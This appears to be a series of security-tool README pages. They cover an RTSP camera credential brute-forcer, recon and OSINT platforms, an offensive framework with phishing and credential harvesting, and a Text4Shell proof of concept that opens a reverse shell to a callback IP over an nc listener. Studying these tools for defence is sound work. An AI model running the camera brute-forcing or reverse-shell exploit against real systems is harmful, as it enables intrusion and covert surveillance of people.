    • Smart retry mechanisms
    • Parallel connection handling

    • Advanced Output & Analysis

    • Real-time console feedback
    • Detailed logging system
    • Camera fingerprinting
    • Vendor detection
    • Stream capability analysis
    • Multiple output formats (verbose, raw)

    πŸ“‹ Requirements

    • Go 1.19 or higher
    • ffmpeg (required for screenshot functionality)
    • Internet connection
    • Root/Administrator privileges (for certain scanning modes)
    • Sufficient system resources for large-scale scans

    πŸ”§ Installation

    Using go install (recommended)

    go install github.com/ALW1EZ/camtruder@v3.7.0

    From source

    git clone https://github.com/ALW1EZ/camtruder.git
    cd camtruder
    go build

    πŸš€ Usage

    Basic Commands

    # Scan a single IP
    ./camtruder -t 192.168.1.100

    # Scan a network range
    ./camtruder -t 192.168.1.0/24

    # Search by location with detailed output
    ./camtruder -t london -s
    > [ NET-ISP ] [ 192.168.1.0/24 ] [256]

    # Get raw CIDR ranges for location
    ./camtruder -t london -ss
    > 192.168.1.0/24

    # Scan multiple IPs from file
    ./camtruder -t targets.txt

    # Take screenshots of discovered cameras
    ./camtruder -t 192.168.1.0/24 -m screenshots

    # Pipe from port scanners
    naabu -host 192.168.1.0/24 -p 554 | camtruder
    masscan 192.168.1.0/24 -p554 --rate 1000 | awk '{print $6}' | camtruder
    zmap -p554 192.168.0.0/16 | camtruder

    # Internet scan (scan till 100 hits)
    ./camtruder -t 100

    Advanced Options

    # Custom credentials with increased threads
    ./camtruder -t 192.168.1.0/24 -u admin,root -p pass123,admin123 -w 50

    # Location search with raw output piped to zmap
    ./camtruder -t berlin -ss | while read range; do zmap -p 554 $range; done

    # Save results to file (as full url, you can use mpv --playlist=results.txt to watch the streams)
    ./camtruder -t istanbul -o results.txt

    # Internet scan with limit of 50 workers and verbose output
    ./camtruder -t 100 -w 50 -v

    πŸ› οΈ Command Line Options

    Option Description Default
    -t Target IP, CIDR range, location, or file Required
    -u Custom username(s) Built-in list
    -p Custom password(s) Built-in list
    -w Number of threads 20
    -to Connection timeout (seconds) 5
    -o Output file path None
    -v Verbose output False
    -s Search only - shows ranges with netnames False
    -ss Raw IP range output - only CIDR ranges False
    -po RTSP port 554
    -m Directory to save screenshots (requires ffmpeg) None

    πŸ“Š Output Formats

    Standard Search Output (-s)

    [ TR-NET-ISP ] [ 193.3.52.0/24 ] [256]
    [ EXAMPLE-ISP ] [ 212.175.100.136/29 ] [8]

    Raw CIDR Output (-ss)

    193.3.52.0/24
    212.175.100.136/29

    Scan Results

    ╭─ Found vulnerable camera [Hikvision, H264, 30fps]
    β”œ Host : 192.168.1.100:554
    β”œ Geo : United States/California/Berkeley
    β”œ Auth : admin:12345
    β”œ Path : /Streaming/Channels/1
    β•° URL : rtsp://admin:12345@192.168.1.100:554/Streaming/Channels/1

    ⚠️ Disclaimer

    This tool is intended for security research and authorized testing only. Users are responsible for ensuring they have permission to scan target systems and comply with all applicable laws and regulations.

    πŸ“ License

    This project is licensed under the MIT License - see the LICENSE file for details.

    πŸ™ Acknowledgments

    • Thanks to all contributors and the security research community
    • Special thanks to the Go RTSP library maintainers
    • Inspired by various open-source security tools

    πŸ“¬ Contact


    Made by @ALW1EZ



    Frogy2.0 - An Automated External Reconnaissance And Attack Surface Management (ASM) Toolkit

    By: Unknown


    Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then smartly prioritizes them with highest (most attractive) to lowest (least attractive) from an attacker's playground perspective.


    Features

    • Comprehensive recon:
      Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint.

    • Live asset verification:
      Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable.

    • In-depth web recon:
      Collect detailed HTTP response data (via HTTPX) including metadata, technology stack, status codes, content lengths, and more.

    • Smart prioritization:
      Use a composite scoring system that considers homepage status, login identification, technology stack, and DNS data and much more to generate risk score for each assets helping bug bounty hunters and pentesters focus on the most promising targets to start attacks with.

    • Professional reporting:
      Generate a dynamic, colour-coded HTML report with a modern design and dark/light theme toggle.

    Risk Scoring: Asset Attractiveness Explained

    In this tool, risk scoring is based on the notion of asset attractivenessβ€”the idea that certain attributes or characteristics make an asset more interesting to attackers. If we see more of these attributes, the overall score goes up, indicating a broader "attack surface" that adversaries could leverage. Below is an overview of how each factor contributes to the final risk score.

    Screenshots


    1. Purpose of the Asset

    • Employee-Intended Assets
      If a subdomain or system is meant for internal (employee/colleague) use, it's often higher value for attackers. Internal portals or dashboards tend to hold sensitive data or offer privileged functionality. Therefore, if the domain is flagged as employee‐only, its score increases.

    2. URLs Found

    • Valid/Accessible URL
      If the tool identifies a workable URL (e.g., HTTP/HTTPS) for the asset, it means there's a real endpoint to attack. An asset that isn't listening on a web port or is offline is less interestingβ€”so any resolvable URL raises the score slightly.

    3. Login Interfaces

    • Login Pages
      The presence of a login form indicates some form of access control or user authentication. Attackers often target logins to brute‐force credentials, attempt SQL injection, or exploit session handling. Thus, any discovered login endpoint bumps the score.

    4. HTTP Status 200

    • Accessible Status Code
      If an endpoint actually returns a 200 OK, it often means the page is legitimately reachable and responding with content. A 200 OK is more interesting to attackers than a 404 or a redirectβ€”so a 200 status modestly increases the risk.

    5. TLS Version

    • Modern vs. Outdated TLS
      If an asset is using older SSL/TLS protocols (or no TLS), that's a bigger risk. However, to simplify:
    • TLS 1.2 or 1.3 is considered standard (no penalty).
    • Anything older or absent is penalized by adding to the score.

    6. Certificate Expiry

    • Imminent Expiry
      Certificates expiring soon (within a few weeks) can indicate potential mismanagement or a higher chance of downtime or misconfiguration. Short‐term expiry windows (≀ 7 days, ≀ 14 days, ≀ 30 days) add a cumulative boost to the risk score.

    7. Missing Security Headers

    • Security Header Hygiene
      The tool checks for typical headers like:
    • Strict-Transport-Security (HSTS)
    • X-Frame-Options
    • Content-Security-Policy
    • X-XSS-Protection
    • Referrer-Policy
    • Permissions-Policy

    Missing or disabled headers mean an endpoint is more prone to common web exploits. Each absent header increments the score.

    8. Open Ports

    • Port Exposure
      The more open ports (and associated services) an asset exposes, the broader the potential attack surface. Each open port adds to the risk score.

    9. Technology Stack (Tech Count)

    • Number of Technologies Detected
      Attackers love multi‐tech stacks because more software β†’ more possible CVEs or misconfigurations. Each identified technology (e.g., Apache, PHP, jQuery, etc.) adds to the overall attractiveness of the target.

    Putting It All Together

    Each factor above contributes one or more points to the final risk score. For example:

    1. +1 if the purpose is employee‐intended
    2. +1 if the asset is a valid URL
    3. +1 if a login is found
    4. +1 if it returns HTTP 200
    5. +1 if TLS is older than 1.2 or absent
    6. +1–3 for certificates expiring soon (≀ 30 days)
    7. +1 for each missing security header
    8. +1 per open port
    9. +1 per detected technology
    10. +1 per each management ports open
    11. +1 per each database ports open

    Once all factors are tallied, we get a numeric risk score. Higher means more interesting and potentially gives more room for pentesters to test around to an attacker.

    Why This Matters
    This approach helps you quickly prioritize which assets warrant deeper testing. Subdomains with high counts of open ports, advanced internal usage, missing headers, or login panels are more complex, more privileged, or more likely to be misconfiguredβ€”therefore, your security team can focus on those first.

    Installation

    Clone the repository and run the installer script to set up all dependencies and tools:

    chmod +x install.sh
    ./install.sh

    Usage

    chmod +x frogy.sh
    ./frogy.sh domains.txt

    Video Demo

    https://www.youtube.com/watch?v=LHlU4CYNj1M

    Future Roadmap

    • Completed βœ… ~~Adding security and compliance-related data (SSL/TLS hygiene, SPF, DMARC, Headers etc)~~
    • Completed βœ… ~~Allow to filter column data.~~
    • Completed βœ… ~~Add more analytics based on new data.~~
    • Completed βœ… ~~Identify login portals.~~
    • Completed βœ… ~~Basic dashboard/analytics if possible.~~
    • Completed βœ… ~~Display all open ports in one of the table columns.~~
    • Completed βœ… ~~Pagination to access information faster without choking or lagging on the home page.~~
    • Completed βœ… ~~Change font color in darkmode.~~
    • Completed βœ… ~~Identify traditional endpoints vs. API endpoints.~~
    • Completed βœ… ~~Identifying customer-intended vs colleague-intended applications.~~
    • Completed βœ… ~~Enhance prioritisation for target picking. (Scoring based on management ports, login found, customer vs colleague intended apps, security headers not set, ssl/tls usage, etc.)~~
    • Completed βœ… ~~Implement parallel run, time out functionality.~~
    • Completed βœ… ~~Scan SSL/TLS for the url:port pattern and not just domain:443 pattern.-~~
    • Completed βœ… ~~Using mouseover on the attack surface column's score, you can now know why and how score is calculated-~~
    • Completed βœ… ~~Generate CSV output same as HTML table.~~
    • Completed βœ… ~~Self-contained HTML output is generated now. So no need to host a file on web server to access results.~~
    • Completed βœ… ~~To add all DNS records (A, MX, SOA, SRV, CNAME, CAA, etc.)~~
    • Completed βœ… ~~Consolidate the two CDN charts into one.~~
    • Completed βœ… ~~Added PTR record column to the main table.~~
    • Completed βœ… ~~Implemented horizontal and vertical scrolling for tables and charts, with the first title row frozen for easier data reference while scrolling.~~
    • Completed βœ… ~~Added screenshot functionality.~~
    • Completed βœ… ~~Added logging functionality. Logs are stored at /logs/logs.log~~
    • Completed βœ… ~~Added extra score for the management and database ports exposed.~~
    • Solve the screen jerk issue.
    • Identify abandoned and unwanted applications.


    PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

    By: Unknown


                                  ____                                  _   _ 
    | _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
    | |_) / _ \/ _` |/ _` / __| | | / __| \| |
    | __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
    |_| \___|\__, |\__,_|___/\__,_|___/_| \_|
    |___/
    β–ˆβ–ˆβ–ˆβ–„ β–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
    β–ˆβ–ˆ β–€β–ˆ β–ˆ β–“β–ˆ β–€ β–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’
    β–“β–ˆβ–ˆ β–€β–ˆ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’
    β–“β–ˆβ–ˆβ–’ β–β–Œβ–ˆβ–ˆβ–’β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘
    β–’β–ˆβ–ˆβ–‘ β–“β–ˆβ–ˆβ–‘β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘
    β–‘ β–’β–‘ β–’ β–’ β–‘β–‘ β–’β–‘ β–‘β–‘ β–’β–‘β–’β–‘β–’β–‘
    β–‘ β–‘β–‘ β–‘ β–’β–‘ β–‘ β–‘ β–‘ β–‘ β–’ β–’β–‘
    β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–’
    β–‘ β–‘ β–‘ β–‘ β–‘

    PEGASUS-NEO Penetration Testing Framework

    Β 

    πŸ›‘οΈ Description

    PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

    ⚠️ Legal Disclaimer

    This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

    Developers assume no liability and are not responsible for any misuse or damage caused by this program.

    πŸ”’ Copyright Notice

    PEGASUS-NEO - Advanced Penetration Testing Framework
    Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

    This software is proprietary and confidential. Unauthorized copying, transfer, or
    reproduction of this software, via any medium is strictly prohibited.

    Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

    🌟 Features

    Password: Sobri

    • Reconnaissance & OSINT
    • Network scanning
    • Email harvesting
    • Domain enumeration
    • Social media tracking

    • Exploitation & Pentesting

    • Automated exploitation
    • Password attacks
    • SQL injection
    • Custom payload generation

    • Wireless Attacks

    • WiFi cracking
    • Evil twin attacks
    • WPS exploitation

    • Web Attacks

    • Directory scanning
    • XSS detection
    • SQL injection
    • CMS scanning

    • Social Engineering

    • Phishing templates
    • Email spoofing
    • Credential harvesting

    • Tracking & Analysis

    • IP geolocation
    • Phone number tracking
    • Email analysis
    • Social media hunting

    πŸ”§ Installation

    # Clone the repository
    git clone https://github.com/sobri3195/pegasus-neo.git

    # Change directory
    cd pegasus-neo

    # Install dependencies
    sudo python3 -m pip install -r requirements.txt

    # Run the tool
    sudo python3 pegasus_neo.py

    πŸ“‹ Requirements

    • Python 3.8+
    • Linux Operating System (Kali/Ubuntu recommended)
    • Root privileges
    • Internet connection

    πŸš€ Usage

    1. Start the tool:
    sudo python3 pegasus_neo.py
    1. Enter authentication password
    2. Select category from main menu
    3. Choose specific tool or module
    4. Follow on-screen instructions

    πŸ” Security Features

    • Source code protection
    • Integrity checking
    • Anti-tampering mechanisms
    • Encrypted storage
    • Authentication system

    πŸ› οΈ Supported Tools

    Reconnaissance & OSINT

    • Nmap
    • Wireshark
    • Maltego
    • Shodan
    • theHarvester
    • Recon-ng
    • SpiderFoot
    • FOCA
    • Metagoofil

    Exploitation & Pentesting

    • Metasploit
    • SQLmap
    • Commix
    • BeEF
    • SET
    • Hydra
    • John the Ripper
    • Hashcat

    Wireless Hacking

    • Aircrack-ng
    • Kismet
    • WiFite
    • Fern Wifi Cracker
    • Reaver
    • Wifiphisher
    • Cowpatty
    • Fluxion

    Web Hacking

    • Burp Suite
    • OWASP ZAP
    • Nikto
    • XSStrike
    • Wapiti
    • Sublist3r
    • DirBuster
    • WPScan

    πŸ“ Version History

    • v1.0.0 (2024-01) - Initial release
    • v1.1.0 (2024-02) - Added tracking modules
    • v1.2.0 (2024-03) - Added tool installer

    πŸ‘₯ Contributing

    This is a proprietary project and contributions are not accepted at this time.

    🀝 Support

    For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana

    βš–οΈ License

    This project is protected under proprietary license. See the LICENSE file for details.

    Made with ❀️ by Letda Kes dr. Sobri



    Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

    By: Unknown


    A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

    In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

    Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


    Description

    This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

    Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

    Usage

    python3 text4shell.py <target_ip> <callback_ip> <callback_port>

    Example

    python3 text4shell.py 127.0.0.1 192.168.1.2 4444

    Make sure to set up a lsitener on your attacking machine:

    nc -nlvp 4444

    Payload Logic

    The script injects:

    ${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

    The reverse shell is sent via /data parameter using a POST request.



    Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

    By: Unknown


    A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

    The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest.

    Next JS versions affected: - 11.1.4 and up

    [!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.

    Β 

    Installation

    Clone the repo

    git clone https://github.com/takumade/ghost-route.git
    cd ghost-route

    Create and activate virtual environment

    python -m venv .venv
    source .venv/bin/activate

    Install dependencies

    pip install -r requirements.txt

    Usage

    python ghost-route.py <url> <path> <show_headers>
    • <url>: Base URL of the Next.js site (e.g., https://example.com)
    • <path>: Protected path to test (default: /admin)
    • <show_headers>: Show response headers (default: False)

    Example

    Basic Example

    python ghost-route.py https://example.com /admin

    Show Response Headers

    python ghost-route.py https://example.com /admin True

    License

    MIT License

    Credits



    Bytesrevealer - Online Reverse Enginerring Viewer

    By: Unknown


    Bytes Revealer is a powerful reverse engineering and binary analysis tool designed for security researchers, forensic analysts, and developers. With features like hex view, visual representation, string extraction, entropy calculation, and file signature detection, it helps users uncover hidden data inside files. Whether you are analyzing malware, debugging binaries, or investigating unknown file formats, Bytes Revealer makes it easy to explore, search, and extract valuable information from any binary file.

    Bytes Revealer do NOT store any file or data. All analysis is performed in your browser.

    Current Limitation: Files less than 50MB can perform all analysis, files bigger up to 1.5GB will only do Visual View and Hex View analysis.


    Features

    File Analysis

    • Chunked file processing for memory efficiency
    • Real-time progress tracking
    • File signature detection
    • Hash calculations (MD5, SHA-1, SHA-256)
    • Entropy and Bytes Frequency analysis

    Multiple Views

    File View

    • Basic file information and metadata
    • File signatures detection
    • Hash values
    • Entropy calculation
    • Statistical analysis

    Visual View

    • Binary data visualization
    • ASCII or Bytes searching
    • Data distribution view
    • Highlighted pattern matching

    Hex View

    • Traditional hex editor interface
    • Byte-level inspection
    • Highlighted pattern matching
    • ASCII representation
    • ASCII or Bytes searching

    String Analysis

    • ASCII and UTF-8 string extraction
    • String length analysis
    • String type categorization
    • Advanced filtering and sorting
    • String pattern recognition
    • Export capabilities

    Search Capabilities

    • Hex pattern search
    • ASCII/UTF-8 string search
    • Regular expression support
    • Highlighted search results

    Technical Details

    Built With

    • Vue.js 3
    • Tailwind CSS
    • Web Workers for performance
    • Modern JavaScript APIs

    Performance Features

    • Chunked file processing
    • Web Worker implementation
    • Memory optimization
    • Cancelable operations
    • Progress tracking

    Getting Started

    Prerequisites

    # Node.js 14+ is required
    node -v

    Docker Usage

    docker-compose build --no-cache

    docker-compose up -d

    Now open your browser: http://localhost:8080/

    To stop the docker container

    docker-compose down

    Installation

    # Clone the repository
    git clone https://github.com/vulnex/bytesrevealer

    # Navigate to project directory
    cd bytesrevealer

    # Install dependencies
    npm install

    # Start development server
    npm run dev

    Building for Production

    # Build the application
    npm run build

    # Preview production build
    npm run preview

    Usage

    1. File Upload
    2. Click "Choose File" or drag and drop a file
    3. Progress bar shows upload and analysis status

    4. Analysis Views

    5. Switch between views using the tab interface
    6. Each view provides different analysis perspectives
    7. Real-time updates as you navigate

    8. Search Functions

    9. Use the search bar for pattern matching
    10. Toggle between hex and string search modes
    11. Results are highlighted in the current view

    12. String Analysis

    13. View extracted strings with type and length
    14. Filter strings by type or content
    15. Sort by various criteria
    16. Export results in multiple formats

    Performance Considerations

    • Large files are processed in chunks
    • Web Workers handle intensive operations
    • Memory usage is optimized
    • Operations can be canceled if needed

    Browser Compatibility

    • Chrome 80+
    • Firefox 75+
    • Safari 13.1+
    • Edge 80+

    Contributing

    1. Fork the project
    2. Create your feature branch (git checkout -b feature/AmazingFeature)
    3. Commit your changes (git commit -m 'Add some AmazingFeature')
    4. Push to the branch (git push origin feature/AmazingFeature)
    5. Open a Pull Request

    License

    This project is licensed under the MIT License - see the LICENSE.md file for details.

    Security Considerations

    • All strings are properly escaped
    • Input validation is implemented
    • Memory limits are enforced
    • File size restrictions are in place

    Future Enhancements

    • Additional file format support
    • More visualization options
    • Pattern recognition improvements
    • Advanced string analysis features
    • Export/import capabilities
    • Collaboration features


    CentralizedFirewall - Provides A Firewall Manager API Designed To Centralize And Streamline The Management Of Firewall Configurations

    By: Unknown


    Firewall Manager API Project

    Installation

    Follow these steps to set up and run the API project:

    1. Clone the Repository

    git clone https://github.com/adriyansyah-mf/CentralizedFirewall
    cd CentralizedFirewall

    2. Edit the .env File

    Update the environment variables in .env according to your configuration.

    nano .env

    3. Start the API with Docker Compose

    docker compose up -d

    This will start the API in detached mode.

    4. Verify the API is Running

    Check if the containers are up:

    docker ps

    Additional Commands

    Stop the API

    docker compose down

    Restart the API

    docker compose restart

    Let me know if you need any modifications! πŸš€

    How to setup for the first time and connect to firewall client

    1. Install Firewall Agent on your node server
    2. Run the agent with the following command
    sudo dpkg -i firewall-client_deb.deb
    1. Create a New Group on the Firewall Manager
    2. Create New API Key on the Firewall Manager
    3. Edit the configuration file on the node server
    nano /usr/local/bin/config.ini
    1. Add the following configuration
    [settings]
    api_url = API-URL
    api_key = API-KEY
    hostname = Node Hostname (make it unique and same as the hostname on the SIEM)
    1. Restart the firewall agent
    systemctl daemon-reload
    systemctl start firewall-agent
    1. Check the status of the firewall agent
    systemctl status firewall-agent
    1. You will see the connected node on the Firewall Manager

    Default Credential

    Username: admin
    Password: admin

    You can change the default credential on the setting page

    How to Integration with SIEM

    1. Install the SIEM on your server
    2. Configure the SIEM to send the log to the Firewall Manager (You can do this via SOAR or SIEM configuration) The request should be POST with the following format
    3. The format of the log should be like this
    curl -X 'POST' \
    'http://api-server:8000/general/add-ip?ip=123.1.1.99&hostname=test&apikey=apikey&comment=log' \
    -H 'accept: application/json' \
    -d ''

    You can see the swagger documentation on the following link

    http://api-server:8000/docs

    The .env detail configuration

    DB=changeme
    JWT_SECRET=changeme
    PASSWORD_SALT=changme
    PASSWORD_TOKEN_KEY=changme
    OPENCTI_URL=changme
    OPENCTI_TOKEN=changme

    Sponsor This Project πŸ’–

    If you find this project helpful, consider supporting me through GitHub Sponsors



    PANO - Advanced OSINT Investigation Platform Combining Graph Visualization, Timeline Analysis, And AI Assistance To Uncover Hidden Connections In Data

    By: Unknown


    PANO is a powerful OSINT investigation platform that combines graph visualization, timeline analysis, and AI-powered tools to help you uncover hidden connections and patterns in your data.

    Getting Started

    1. Clone the repository: bash git clone https://github.com/ALW1EZ/PANO.git cd PANO

    2. Run the application:

    3. Linux: ./start_pano.sh
    4. Windows: start_pano.bat

    The startup script will automatically: - Check for updates - Set up the Python environment - Install dependencies - Launch PANO

    In order to use Email Lookup transform You need to login with GHunt first. After starting the pano via starter scripts;

    1. Select venv manually
    2. Linux: source venv/bin/activate
    3. Windows: call venv\Scripts\activate
    4. See how to login here

    πŸ’‘ Quick Start Guide

    1. Create Investigation: Start a new investigation or load an existing one
    2. Add Entities: Drag entities from the sidebar onto the graph
    3. Discover Connections: Use transforms to automatically find relationships
    4. Analyze: Use timeline and map views to understand patterns
    5. Save: Export your investigation for later use

    πŸ” Features

    πŸ•ΈοΈ Core Functionality

    • Interactive Graph Visualization
    • Drag-and-drop entity creation
    • Multiple layout algorithms (Circular, Hierarchical, Radial, Force-Directed)
    • Dynamic relationship mapping
    • Visual node and edge styling

    • Timeline Analysis

    • Chronological event visualization
    • Interactive timeline navigation
    • Event filtering and grouping
    • Temporal relationship analysis

    • Map Integration

    • Geographic data visualization
    • Location-based analysis
    • Interactive mapping features
    • Coordinate plotting and tracking

    🎯 Entity Management

    • Supported Entity Types
    • πŸ“§ Email addresses
    • πŸ‘€ Usernames
    • 🌐 Websites
    • πŸ–ΌοΈ Images
    • πŸ“ Locations
    • ⏰ Events
    • πŸ“ Text content
    • πŸ”§ Custom entity types

    πŸ”„ Transform System

    • Email Analysis
    • Google account investigation
    • Calendar event extraction
    • Location history analysis
    • Connected services discovery

    • Username Analysis

    • Cross-platform username search
    • Social media profile discovery
    • Platform correlation
    • Web presence analysis

    • Image Analysis

    • Reverse image search
    • Visual content analysis
    • Metadata extraction
    • Related image discovery

    πŸ€– AI Integration

    • PANAI
    • Natural language investigation assistant
    • Automated entity extraction and relationship mapping
    • Pattern recognition and anomaly detection
    • Multi-language support
    • Context-aware suggestions
    • Timeline and graph analysis

    🧩 Core Components

    πŸ“¦ Entities

    Entities are the fundamental building blocks of PANO. They represent distinct pieces of information that can be connected and analyzed:

    • Built-in Types
    • πŸ“§ Email: Email addresses with service detection
    • πŸ‘€ Username: Social media and platform usernames
    • 🌐 Website: Web pages with metadata
    • πŸ–ΌοΈ Image: Images with EXIF and analysis
    • πŸ“ Location: Geographic coordinates and addresses
    • ⏰ Event: Time-based occurrences
    • πŸ“ Text: Generic text content

    • Properties System

    • Type-safe property validation
    • Automatic property getters
    • Dynamic property updates
    • Custom property types
    • Metadata support

    ⚑ Transforms

    Transforms are automated operations that process entities to discover new information and relationships:

    • Operation Types
    • πŸ” Discovery: Find new entities from existing ones
    • πŸ”— Correlation: Connect related entities
    • πŸ“Š Analysis: Extract insights from entity data
    • 🌐 OSINT: Gather open-source intelligence
    • πŸ”„ Enrichment: Add data to existing entities

    • Features

    • Async operation support
    • Progress tracking
    • Error handling
    • Rate limiting
    • Result validation

    πŸ› οΈ Helpers

    Helpers are specialized tools with dedicated UIs for specific investigation tasks:

    • Available Helpers
    • πŸ” Cross-Examination: Analyze statements and testimonies
    • πŸ‘€ Portrait Creator: Generate facial composites
    • πŸ“Έ Media Analyzer: Advanced image processing and analysis
    • πŸ” Base Searcher: Search near places of interest
    • πŸ”„ Translator: Translate text between languages

    • Helper Features

    • Custom Qt interfaces
    • Real-time updates
    • Graph integration
    • Data visualization
    • Export capabilities

    πŸ‘₯ Contributing

    We welcome contributions! To contribute to PANO:

    1. Fork the repository at https://github.com/ALW1EZ/PANO/
    2. Make your changes in your fork
    3. Test your changes thoroughly
    4. Create a Pull Request to our main branch
    5. In your PR description, include:
    6. What the changes do
    7. Why you made these changes
    8. Any testing you've done
    9. Screenshots if applicable

    Note: We use a single main branch for development. All pull requests should be made directly to main.

    πŸ“– Development Guide

    Click to expand development documentation ### System Requirements - Operating System: Windows or Linux - Python 3.11+ - PySide6 for GUI - Internet connection for online features ### Custom Entities Entities are the core data structures in PANO. Each entity represents a piece of information with specific properties and behaviors. To create a custom entity: 1. Create a new file in the `entities` folder (e.g., `entities/phone_number.py`) 2. Implement your entity class:
    from dataclasses import dataclass
    from typing import ClassVar, Dict, Any
    from .base import Entity

    @dataclass
    class PhoneNumber(Entity):
    name: ClassVar[str] = "Phone Number"
    description: ClassVar[str] = "A phone number entity with country code and validation"

    def init_properties(self):
    """Initialize phone number properties"""
    self.setup_properties({
    "number": str,
    "country_code": str,
    "carrier": str,
    "type": str, # mobile, landline, etc.
    "verified": bool
    })

    def update_label(self):
    """Update the display label"""
    self.label = self.format_label(["country_code", "number"])
    ### Custom Transforms Transforms are operations that process entities and generate new insights or relationships. To create a custom transform: 1. Create a new file in the `transforms` folder (e.g., `transforms/phone_lookup.py`) 2. Implement your transform class:
    from dataclasses import dataclass
    from typing import ClassVar, List
    from .base import Transform
    from entities.base import Entity
    from entities.phone_number import PhoneNumber
    from entities.location import Location
    from ui.managers.status_manager import StatusManager

    @dataclass
    class PhoneLookup(Transform):
    name: ClassVar[str] = "Phone Number Lookup"
    description: ClassVar[str] = "Lookup phone number details and location"
    input_types: ClassVar[List[str]] = ["PhoneNumber"]
    output_types: ClassVar[List[str]] = ["Location"]

    async def run(self, entity: PhoneNumber, graph) -> List[Entity]:
    if not isinstance(entity, PhoneNumber):
    return []

    status = StatusManager.get()
    operation_id = status.start_loading("Phone Lookup")

    try:
    # Your phone number lookup logic here
    # Example: query an API for phone number details
    location = Location(properties={
    "country": "Example Country",
    "region": "Example Region",
    "carrier": "Example Carrier",
    "source": "PhoneLookup transform"
    })

    return [location]

    except Exception as e:
    status.set_text(f"Error during phone lookup: {str(e)}")
    return []

    finally:
    status.stop_loading(operation_id)
    ### Custom Helpers Helpers are specialized tools that provide additional investigation capabilities through a dedicated UI interface. To create a custom helper: 1. Create a new file in the `helpers` folder (e.g., `helpers/data_analyzer.py`) 2. Implement your helper class:
    from PySide6.QtWidgets import (
    QWidget, QVBoxLayout, QHBoxLayout, QPushButton,
    QTextEdit, QLabel, QComboBox
    )
    from .base import BaseHelper
    from qasync import asyncSlot

    class DummyHelper(BaseHelper):
    """A dummy helper for testing"""

    name = "Dummy Helper"
    description = "A dummy helper for testing"

    def setup_ui(self):
    """Initialize the helper's user interface"""
    # Create input text area
    self.input_label = QLabel("Input:")
    self.input_text = QTextEdit()
    self.input_text.setPlaceholderText("Enter text to process...")
    self.input_text.setMinimumHeight(100)

    # Create operation selector
    operation_layout = QHBoxLayout()
    self.operation_label = QLabel("Operation:")
    self.operation_combo = QComboBox()
    self.operation_combo.addItems(["Uppercase", "Lowercase", "Title Case"])
    operation_layout.addWidget(self.operation_label)
    operation_layout.addWidget(self.operation_combo)

    # Create process button
    self.process_btn = QPushButton("Process")
    self.process_btn.clicked.connect(self.process_text)

    # Create output text area
    self.output_label = QLabel("Output:")
    self.output_text = QTextEdit()
    self.output_text.setReadOnly(True)
    self.output_text.setMinimumHeight(100)

    # Add widgets to main layout
    self.main_layout.addWidget(self.input_label)
    self.main_layout.addWidget(self.input_text)
    self.main_layout.addLayout(operation_layout)
    self.main_layout.addWidget(self.process_btn)
    self.main_layout.addWidget(self.output_label)
    self.main_layout.addWidget(self.output_text)

    # Set dialog size
    self.resize(400, 500)

    @asyncSlot()
    async def process_text(self):
    """Process the input text based on selected operation"""
    text = self.input_text.toPlainText()
    operation = self.operation_combo.currentText()

    if operation == "Uppercase":
    result = text.upper()
    elif operation == "Lowercase":
    result = text.lower()
    else: # Title Case
    result = text.title()

    self.output_text.setPlainText(result)

    πŸ“„ License

    This project is licensed under the Creative Commons Attribution-NonCommercial (CC BY-NC) License.

    You are free to: - βœ… Share: Copy and redistribute the material - βœ… Adapt: Remix, transform, and build upon the material

    Under these terms: - ℹ️ Attribution: You must give appropriate credit - 🚫 NonCommercial: No commercial use - πŸ”“ No additional restrictions

    πŸ™ Acknowledgments

    Special thanks to all library authors and contributors who made this project possible.

